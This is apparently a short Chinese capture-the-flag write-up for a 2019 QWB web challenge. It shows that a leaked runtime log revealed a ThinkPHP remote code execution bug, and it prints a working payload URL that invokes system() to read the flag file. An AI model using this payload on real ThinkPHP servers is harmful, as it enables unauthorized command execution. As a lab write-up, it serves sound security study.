[Web] 强网先锋-上单 - LanceaKing xp0int Posted on May 27 2019 访问`/1/runtime/log/201903/12.log`,发现有payload: ![title](https://leanote.com/api/file/getImage?fileId=5ceaa4feab6441777400704f) 是thinkphp的rce。 payload: `/1/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag` ![title](https://leanote.com/api/file/getImage?fileId=5ceaa5ceab6441757b00712d) 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [Web] 高明的黑客 - LanceaKing [Pwn] trywrite -cpt.shao
没有帐号? 立即注册